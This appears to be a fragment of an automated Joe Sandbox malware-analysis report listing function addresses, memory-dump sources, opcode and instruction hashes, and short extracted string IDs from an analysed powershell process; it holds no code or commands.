                                                                                                                                                                • Opcode Fuzzy Hash: 8ad3b3898efba0afa8f96fdadf384720cab6a4792946a4f558ac6e0af3661978
                                                                                                                                                                • Instruction Fuzzy Hash: 3801A2715093409AE7308A29CD84B67BF98EF51324F18C56AED884B266C77D9C45CAB1
                                                                                                                                                                Function 0074D01C Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1970403084.000000000074D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0074D000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_74d000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 042fb91e483d303bec4ba370dbe15642156df6ed660e42c8d0949f921d5382d4
                                                                                                                                                                • Instruction ID: 7c4a234ba8be58d4e73d72b9264e4e77d42900804a083fff0791e54f8644d7b6
                                                                                                                                                                • Opcode Fuzzy Hash: 042fb91e483d303bec4ba370dbe15642156df6ed660e42c8d0949f921d5382d4
                                                                                                                                                                • Instruction Fuzzy Hash: 5BF06271405344AEE7208A1ACDC4B66FFA8EB51734F18C55AED884F296C3799C45CAB1

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 06F808A0 Relevance: 11.6, Strings: 9, Instructions: 321COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$l$l
                                                                                                                                                                • API String ID: 0-671944917
                                                                                                                                                                • Opcode ID: 956132871a0a7d745d63d52a8158ba795538f9e1033a5a557ac85d582dcabb94
                                                                                                                                                                • Instruction ID: 0548929d3fd589eaad2e10363c02672a3d2ea2d27f3f489b839a98778c94ea7d
                                                                                                                                                                • Opcode Fuzzy Hash: 956132871a0a7d745d63d52a8158ba795538f9e1033a5a557ac85d582dcabb94
                                                                                                                                                                • Instruction Fuzzy Hash: A3A15632F043558FD765AA79981066BBBE6AFC5210B1884EAD445CB362DF32CC49C7E1
                                                                                                                                                                Function 06F814E8 Relevance: 8.9, Strings: 7, Instructions: 192COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q$l$l
                                                                                                                                                                • API String ID: 0-1462244110
                                                                                                                                                                • Opcode ID: ad6575ef8b63c0bb9b433dee3c4d1ef9e87c7277ee959e007020d47cd95ce3f6
                                                                                                                                                                • Instruction ID: 7cbe25e4bbee3c287a3b24822636ca54ace503c49c127b960b3c122d977952c9
                                                                                                                                                                • Opcode Fuzzy Hash: ad6575ef8b63c0bb9b433dee3c4d1ef9e87c7277ee959e007020d47cd95ce3f6
                                                                                                                                                                • Instruction Fuzzy Hash: 0D515C31F043068FDB74E66D9805767BBA6AFC2610F1886FAD486CF251DB31C846C7A1
                                                                                                                                                                Function 06F80F80 Relevance: 5.4, Strings: 4, Instructions: 379COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                                                                                • API String ID: 0-3859475322
                                                                                                                                                                • Opcode ID: bc00079a1f9d166f467b6345eebd02119fadbb6b7edadc964228499b771abc7c
                                                                                                                                                                • Instruction ID: 69e52b1201e97bd91c67d1f1c4c5c4997adab8f7f894852fec1b73293151e71a
                                                                                                                                                                • Opcode Fuzzy Hash: bc00079a1f9d166f467b6345eebd02119fadbb6b7edadc964228499b771abc7c
                                                                                                                                                                • Instruction Fuzzy Hash: 16C14831F043469FD770EB6888057ABBBF6AF86310F1485EAD445DB651DA31C886CBA2
                                                                                                                                                                Function 06F83518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                • API String ID: 0-2125118731
                                                                                                                                                                • Opcode ID: c98888abeabeac73f697f48b1cdafe0814654437740124ef0e4e476d3ed9fa12
                                                                                                                                                                • Instruction ID: 9112d6cfd0b1b46e8aecb22fd611c78417060415f128a399593644e4784c1738
                                                                                                                                                                • Opcode Fuzzy Hash: c98888abeabeac73f697f48b1cdafe0814654437740124ef0e4e476d3ed9fa12
                                                                                                                                                                • Instruction Fuzzy Hash: 06212933B003065FDBB875AD9C05B27AAD65BC0F14F2484BAA405CF3A5DD36D845C361
                                                                                                                                                                Function 06F80571 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.1982163381.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_4_2_6f80000_powershell.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                • API String ID: 0-2049395529
                                                                                                                                                                • Opcode ID: 11390109334954997d14260d988e9e65e732b5413e69367f291aeb237d0b923a
                                                                                                                                                                • Instruction ID: 81ee0aa54b8fb630e2e2081028dcbcb482fb49dfcb690653b87bb2168bc4a830
                                                                                                                                                                • Opcode Fuzzy Hash: 11390109334954997d14260d988e9e65e732b5413e69367f291aeb237d0b923a
                                                                                                                                                                • Instruction Fuzzy Hash: 90012B22F493844FC73A267C18285566FB35F9250075A05DBD081DF366CE198D4DC3B2